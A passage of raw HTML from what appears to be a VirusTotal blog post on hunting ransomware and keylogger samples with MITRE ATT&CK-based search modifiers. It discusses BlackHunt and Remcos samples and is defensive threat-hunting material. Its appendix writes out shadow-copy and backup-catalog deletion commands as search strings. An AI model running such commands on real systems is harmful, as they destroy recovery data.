style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Windows\SysWow64</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Google</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Mozilla Firefox</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Microsoft</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Common Files</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Internet Download Manager</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Temp</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Microsoft</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Google</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Windows\Temp</span>
</p>
</td>
</tr>
</tbody>
</table> </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
/*font-weight: bold;*/
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-fields {
background: #86aaf9;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
table.no-spacing {
border-spacing:0; /* Removes the cell spacing via CSS */
border-collapse: collapse; /* Optional - if you don't want to have double border where cells touch */
}
.pmargin {
margin: 0;
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
pre {
background: #f4f4f4;
border: 1px solid #ddd;
border-left: 3px solid #7ad3ff;
color: #666;
page-break-inside: avoid;
font-family: monospace;
font-size: 15px;
line-height: 1.6;
margin-bottom: 1.6em;
max-width: 100%;
overflow: auto;
padding: 1em 1.5em;
display: block;
word-wrap: break-word;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-81894513007353853282024-02-21T10:46:00.008+01:002024-02-22T09:43:43.840+01:00Following MITRE's footsteps in analyzing malware behavior<div class="interval_12">
The <b><a href="https://attack.mitre.org/" target="_blank">MITRE</a></b> framework helps all defenders speak the same language regarding attackers' modus operandi. VirusTotal provides multiple data points where MITRE's Tactics and Techniques are dynamically extracted from samples when detonated in our sandboxes.
In particular, samples' MITRE mapping can be found under the <b>BEHAVIOR</b> tab of a file's report. This data is searchable in <b><a href="https://docs.virustotal.com/docs/virustotal-intelligence-introduction" target="_blank">VirusTotal Intelligence</a></b> (VTI) with the help of a set of specific <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">file search modifiers</a>.
</div>
<div class="interval_12">
In this article, we'll illustrate how security analysts can leverage MITRE for malware detection and <b>behavior</b>-based hunting for ransomware and keylogger samples.
</div>
<br />
<h2 style="text-align: left;">Hunting for Ransomware</h2>
<div class="interval_12">
The security industry historically identified a set of <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf" target="_blank">commonly used techniques</a> in <b>Ransomware</b> campaigns, including <a href="https://attack.mitre.org/techniques/T1490/" target="_blank">inhibiting the system recovery</a> and <a href="https://attack.mitre.org/techniques/T1083/" target="_blank">discovering local files</a> and <a href="https://attack.mitre.org/techniques/T1135/" target="_blank">network shares</a> for later <a href="https://attack.mitre.org/techniques/T1486/" target="_blank">data encryption</a>, usually combined with <a href="https://attack.mitre.org/tactics/TA0010/" target="_blank">exfiltration</a> and/or <a href="https://attack.mitre.org/tactics/TA0011/" target="_blank">Command and Control</a> techniques.
</div>
<div class="central_img width_60 interval_12">
<img src="https://lh7-us.googleusercontent.com/Sfy6VIt1uPPGgGIT7Z4OOEy4n5e4EGFnrUc8gJ2vmA4iy11rIrhJpPX6OIwPyY_YPjBnUDV1DIMhp92EosShhWx7NOqD12EJRBmwiiMDHgVRZa9fn1HlU9vI9pkjwXtUWolJGT-bOSmDBKQYbkWNsZfo6svqfKZj37nls0NtB7rcyZYbDoopJBThzBuETUk" />
<p><i>Common TTPs of modern ransomware groups by <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf" target="_blank">Kaspersky</a></i></p>
</div>
<div class="interval_12">In VT Intelligence we can use 2 search modifiers to query files behavior mapped to <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&CK</a>:
</div>
<div class="interval_12">
<ul>
<li><b>"attack_tactic"</b> search modifier followed by the <a href="https://attack.mitre.org/tactics/enterprise/" target="_blank">MITRE Tactic ID</a> returns the list of files that, based on our sandboxes analysis reports, execute techniques under the specified tactic. For example:
<ul>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0040/files" target="_blank">attack_tactic: TA0040</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0007/files" target="_blank">attack_tactic: TA0007</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0010/files" target="_blank">attack_tactic: TA0010</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0011/files" target="_blank">attack_tactic: TA0011</a></li>
</ul>
</li>
<li><b>"attack_technique"</b> search modifier followed by the <a href="https://attack.mitre.org/techniques/enterprise/" target="_blank">MITRE Technique ID</a> returns the list of files that, based on our sandboxes analysis reports, execute the specified technique. For example:
<ul>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1490/files" target="_blank">attack_tactic: T1490</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1083/files" target="_blank">attack_tactic: T1083</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1135/files" target="_blank">attack_tactic: T1135</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1486/files" target="_blank">attack_tactic: T1486</a></li>
</ul>
</li>
</ul>
</div>
<div class="interval_12">
In addition to the <b>"attack_tactic"</b> and <b>"attack_technique"</b> modifiers, VirusTotal provides extra modifiers listed on the <b><a href="#apendix">Appendix I - Behavior search modifiers</a></b> for procedures-based queries at the end of this post.
</div>
<div class="interval_12">
Let's do an example. We want to find samples given a set of ransomware-related techniques combined with the <b>"behavior:<a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt" target="_blank">CryptEncrypt"</a></b> operating system API call (check <a href="#apendix">Appendix I</a> for details). Additionally, we specify the <b>entity</b> we are interested in (<b>files</b>) and the first submission date (<b>fs</b>) to filter out files submitted before 2024-01-01.
</div>
<div class="interval_12">
The resulting query is as follows:
</div>
<div class="interval_12">
<a href="https://www.virustotal.com/gui/search/entity%253Afile%2520attack_technique%253AT1490%2520and%2520attack_technique%253AT1083%2520and%2520attack_technique%253A%2520T1135%2520%2520behavior%253ACryptEncrypt%2520%2520fs%253A2024-01-01%252B/files" target="_blank">entity:file attack_technique:T1490 and attack_technique:T1083 and attack_technique: T1135 behavior:CryptEncrypt fs:2024-01-01+</a>
</div>
<div class="central_img width_100 interval_12">
<img src="https://lh7-us.googleusercontent.com/CJODsRgXlRO5DIZJ9ALfH7vHfk1vrPeMrLeKyfHYyE6aEXcwOokaQnXdkAjPhAJOAKBCLYf2362tKYNFTahlJB2ROe-g7fjDU7VTHj46JPVJR2e1YIEFFYNNfShujhDgGOu_UNLIg7MBUVT4vCAyuSdzWPPtX0R3UoafZDZ9vmCQg3YHAa0YSpHNPk8kcto" />
</div>
<br/>
<div class="interval_12">
Let's analyze in more detail one of the query's resulting files (<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/detection" target="_blank">35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab</a>).
According to the community, the file belongs to a <b>BlackHunt</b> Ransomware campaign threat that <a href="https://vulners.com/rapid7blog/RAPID7BLOG:AD81B8AC3BA63D8024571A2656967360" target="_blank">compromised multiple companies in Paraguay</a>.
</div>
<div class="interval_12">
Its <a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">BEHAVIOR report tab</a>, provides details on the techniques detected during sample's detonation:
</div>
<div class="interval_12">
<ul>
<li><div class="interval_12"><b>T1490</b> (<b>Inhibit System Recovery</b>), the sample deletes the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service" target="_blank">shadow copies</a> (as highlighted in the <b>Capabilities</b> section below) and it also modifies Windows boot settings via <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" target="_blank">bcdedit</a>.</div>
<div class="central_img width_60 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GkWcs4g1wyGjtX7Gim5nkkscFYUL3Ds9K7Ht4xannQdzbeuaHirXpHgJ2hi1Hrmm-gj7tHuDftp_GHp-S2iC4bgyM24tKiI_qZ9Au-S0hIXKYxJ4nhE_doq4GiJt2XiHDMsQ4f3fSDo83JM2wcLHM3-nFlHMS7-s1hkk-zDtSIoIIKAr1un5SnEdoy9E0Gs" />
</a>
</div>
</li>
<li><div class="interval_12"><b>T1083</b> and <b>T1135</b>: The sample runs discovery processes to get system local files and directories, and also network shares.</div>
<div class="central_img width_30 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/oKZGnV7KWtn9u0Yy8MnMtlCZwIGVXUXOBwFdPWAPW00neqvP8A38MPANlmR4bGjLH219ET8GYO8p4dIkU1KSa54QA7ZEykUw5n7XgolaBb3rixmk81BRH4gyGiwH-cjqNZO-OJrpAH94B8U1TX6xe2O4UpvHnxge268SlAtNx6egYLmq17Jz7CEVH5yyguk" />
</a>
</div>
</li>
<li><div class="interval_12">The encryption process is visible by the <a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt" target="_blank">CryptEncrypt</a> operating system API call, functionality provided by the <b>Advapi32.dll</b>, and visible under the file's <a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/details" target="_blank">DETAILS tab</a>.</div>
<div class="central_img width_30 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GxvYOSdtoJ1hxfTpVPsWoyRC8Ik-qtVZajTc2QrekN_29V8_YHRz5tc357B4L2jen-Te-IAJDToYxV6aY27TTeIJrg9w2EqrcGtXksE2T1uoTfHqiaK1kVLlQfUUN40IpToKphY01wbEkX58H1ygvhkIhmqwnp2OtWavnAV275sW_AK_g_UxKAoZ3DAq4yg" />
</a>
</div>
</li>
</ul>
</div>
<br/>
<h2 style="text-align: left;">Hunting for Keyloggers</h2>
<div class="interval_12">
<b>Keyloggers</b> are a particular form of Spyware designed for stealing user data, that commonly share some MITRE Tactics, including <a href="https://attack.mitre.org/tactics/TA0009/" target="_blank">collecting data</a> and/or <a href="https://attack.mitre.org/tactics/TA0007/" target="_blank">discovering data</a> for later <a href="https://attack.mitre.org/tactics/TA0010/" target="_blank">exfiltration</a> and/or <a href="https://attack.mitre.org/tactics/TA0011/" target="_blank">Command and Control</a> communication.
</div>
<div class="interval_12">
For our VTI query we will specify the <a href="https://attack.mitre.org/techniques/T1056/001/" target="_blank">T1056.001: Input Capture: Keylogging</a> sub-technique of the Collection tactic, which identifies keystrokes interception. Additionally, we use the first submitted time condition (<b>fs</b>) and both <b>Command and Control</b> or <b>Exfiltration</b> tactics (<b>attack_tactic</b>), since we are not really interested in restricting the way the data gets outside of the victim environment.
</div>
<div class="interval_12">
<a href="https://www.virustotal.com/gui/search/attack_technique%253AT1056.001%2520(attack_tactic%253ATA0011%2520OR%2520attack_tactic%253ATA0010)%2520%2520fs%253A2024-02-15%252B/files" target="_blank">attack_technique:T1056.001 (attack_tactic:TA0011 OR attack_tactic:TA0010) fs:2024-02-15+</a>
</div>
<div class="central_img width_100 interval_12">
<img src="https://lh7-us.googleusercontent.com/-B4K35DvGOsz_IIGSlWO5eRuPTx-OEhP08ahdtobWk0LbRz-Bt3Irdr4y1sbbHVmPIUzwQ7aySSTy6fy0PArgeRKC6jcBRp00g3HumoUhcPLN31Vm5KmBDlDRm7F8vGbqR3ZILBRLfeWcvB5XbJbuBv52yRHQT9HGGzcJk9Nu0MhNTm2jqnNMl5ADWPgJUI" />
</div>
<br/>
<div class="interval_12">
One of the retrieved files (<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/" target="_blank">975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5</a>) with a 25 out of 71 AV detection ratio is cataloged as <b><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos" target="_blank">Remcos</a></b>, a commercial Remote Access Tool with keylogger capabilities among many others, which has been used by several <a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/community" target="_blank">Threat Actors</a>.
</div>
<div class="central_img width_60 interval_12">
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/details" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GsrIzvLh4clPjXTI-wtMyXA60VmHMhT4udY_kIwH48EKWbBRF3uDeuEMRV5P2mzqj-fn5xOD1xyit9WcJW4IYOamF2IxNcfnwhujYIe8A8s5--YaYHh2cH1rXyOCqoSmzmvOR29bk1XGBkPcZkF2ZEfyjEuO3wu1HP5fn9oZUvNdyTUQg5Ew3yaYU4BjZA4" /> </a>
</div>
<div class="interval_12">
On its <a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/behavior" target="_blank">BEHAVIOR tab</a>, we can see details on the <b>keystrokes</b> interception performed via <a href="https://resources.infosecinstitute.com/topics/hacking/keyloggers-how-they-work-and-more/" target="_blank">polling method</a>. The report also reveals additional functionality, including capturing <b>screenshots</b>, reading victims' <b>clipboard</b> and <b>geographical location</b> of the abused device.
</div>
<div class="interval_12 central_img_set">
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/details" target="_blank">
<img class="width_15" style="display:inline-block;"
src="https://lh7-us.googleusercontent.com/oVUN_Y5ynmn3F4nWGc_UsJekYSEgb20gNrjVpih3BA98sdC3C_GrrKH-f0TwLNAFHnIm9AhMojZNKFKE-ek4xbQk2VNrYE0tSGzRwA1jPhryglQMULHcDI4oM7fBxW9BdO1SYLXvbmX6Zrbd0TJDCX21OLB32byPjZnjt9tAHYevpU3MhMC57MP_qBJpAnU">
</a>
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/behavior" target="_blank">
<img class="width_60" style="display:inline-block;"
src="https://lh7-us.googleusercontent.com/dyRx0PhSvYzDjYGUS2h5W4kwWkNIx3I6axLfGytWY5kvewsw8XaPj2co5P8WAqAT_pxnJVrtldRLKXOVRlfQTzQOtNo90LVrjpqn1vm_tz-5QHxJ7L1nj_HOPtvGcVPAuUW7jIqSCkfEREbshJfj1lm-jzp-QhIjq0sGV26S5Lrzp7VGL8pAkhayd4xDA3U">
</a>
</div>
<br/>
<h2 style="text-align: left;">Conclusions</h2>
<div class="interval_12">
In this post we have seen using a couple of examples how present the <b>MITRE</b> framework is on VirusTotal and how it can be used to search for files with a particular TTP-based behavior using <b>VirusTotal Intelligence</b> searches. MITRE-related data is based on behavior detected during samples' sandbox detonation.
</div>
<div class="interval_12">
We have additionally created an <a href="#apendix">Appendix I</a> (below) detailing some of the most interesting behavior-search modifiers you can use in your queries. This fits particularly well with other TTP-based modifiers, allowing you to refine results by adding particular technical characteristics specific for the malware under analysis.
</div>
<div class="interval_12">
We hope you found this post interesting and useful. For suggestions or feedback please feel free to reach out <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">here</a>, we will be happy to hear from you.
</div>
<div class="interval_12">
Happy hunting!
</div>
<br/>
<h2 style="text-align: left;"> <a name="apendix">Appendix I - Behavior search modifiers </a></h2>
<div class="interval_12">
The following search modifiers provide a more granular way of searching files based on their behavior, allowing more restrictive queries while using <b>Tactics/Techniques</b> (<b>"attack_tactic"</b>, <b>"attack_technique"</b>) search modifiers.
</div>
<div class="interval_12">
<ul>
<li><b>"behavior_processes"</b>: followed by the executable and parameters used to run during the sample dynamic analysis:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%255C%255Cvssadmin.exe%2520delete%2520shadows%2520%252Fall%2520%252Fquiet%2522/files" target="_blank">behavior_processes:"\\vssadmin.exe delete shadows /all /quiet"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522wbadmin.exe%2520delete%2520catalog%2520-quiet%2522/files" target="_blank">behavior_processes:"wbadmin.exe delete catalog -quiet"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%2520tree%2520c%253A%255C%255C%2522/files" target="_blank">behavior_processes:" tree c:\\"</a></li>
</ul>
<li><b>"behavior_injected_processes"</b>: followed by the executable name with or without extension:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_injected_processes%253Alsass.exe/files" target="_blank">behavior_injected_processes:lsass.exe</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_injected_processes%253AWininit.exe/files" target="_blank">behavior_injected_processes:Wininit.exe</a></li>
</ul>
<li><b>"behavior_created_processes"</b>: followed by the executable name with or without extension:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_created_processes%253A%2520Wininit.exe%2520%2520NOT%2520name%253AWininit.exe/files" target="_blank">behavior_created_processes: Wininit.exe NOT name:Wininit.exe </a></li>
</ul>
<li><b>"behavior_services"</b>: followed by the service name to get files opening or deleting internal services:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_services%253A%2520sysmon/files" target="_blank">behavior_services: sysmon</a></li>
</ul>
<li><b>"behavior_registry"</b>: followed by a system registry key to check for new, deleted or modified registry keys:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_registry%253A%2522%255CSoftware%255CMicrosoft%255CWindows%255CCurrentVersion%255CRun%2522/files" target="_blank">behavior_registry:"\Software\Microsoft\Windows\CurrentVersion\Run"</a></li>
</ul>
<li><b>"behavior_network"</b>: followed by an URL, domain or IP address to identify files communicating with those network elements:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_network%253Aip-api.com/files" target="_blank">behavior_network:ip-api.com</a></li>
</ul>
<li><b>"behavior_files"</b>: followed by the file name with or without extension and/or path to identify files that were opened, written, deleted or dropped:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_files%253A%2520%2522C%253A%255CProgramData%255CVaccine.txt%2522/files" target="_blank">behavior_files: "C:\ProgramData\Vaccine.txt"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_files%253A%2520%2522%255CMicrosoft%255CWindows%255CStart%2520Menu%255CPrograms%255CStartup%255C*%2522/files" target="_blank">behavior_files: "\Microsoft\Windows\Start Menu\Programs\Startup\*"</a></li>
</ul>
<li><b>"behavior"</b>: all the previous search modifiers in the appendix can be replaced by this one. It matches against the whole file behavior report and provides a way to check for other data that doesn't have a specific search modifier assigned:</li>
<ul>
<li><b>API calls</b>: <b>Calls Highlighted</b> subsection under <b>Highlighted actions</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520CryptEncrypt/files" target="_blank">behavior: CryptEncrypt</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520IsDebuggerPresent/files" target="_blank">behavior: IsDebuggerPresent</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520IsWow64Process/files" target="_blank">behavior: IsWow64Process</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520GetSystemMetrics/files" target="_blank">behavior: GetSystemMetrics</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520GetAsyncKeyState/files" target="_blank">behavior: GetAsyncKeyState</a></li>
</ul>
<li><b>Mutexes</b> created or opened, under the <b>Synchronization mechanisms & Signals</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253ABLACK_HUNT_MUTEX/files" target="_blank">behavior:BLACK_HUNT_MUTEX</a></li>
</ul>
<li><b>Modules loaded</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253ACRYPTSP.DLL/files" target="_blank">behavior:CRYPTSP.DLL</a></li>
</ul>
</ul>
<li><b>"behavior_tags"</b>: followed by the tag of your interest to get files assigned with the indicated tag that you can check <a href="https://docs.virustotal.com/docs/list-behaviour-tag-modifiers" target="_blank">here</a>.</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_tags%253Adetect_debug_environment/files" target="_blank">behavior_tags:detect_debug_environment</a></li>
</ul>
</ul>
</div>
<a href="" target="_blank">
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
<!--
.central_img img {
border: 1px solid #000000;
}
-->
.central_img p {
text-align: center;
font-style: italic;
}
.central_img_set{
text-align: center;
font-style: italic;
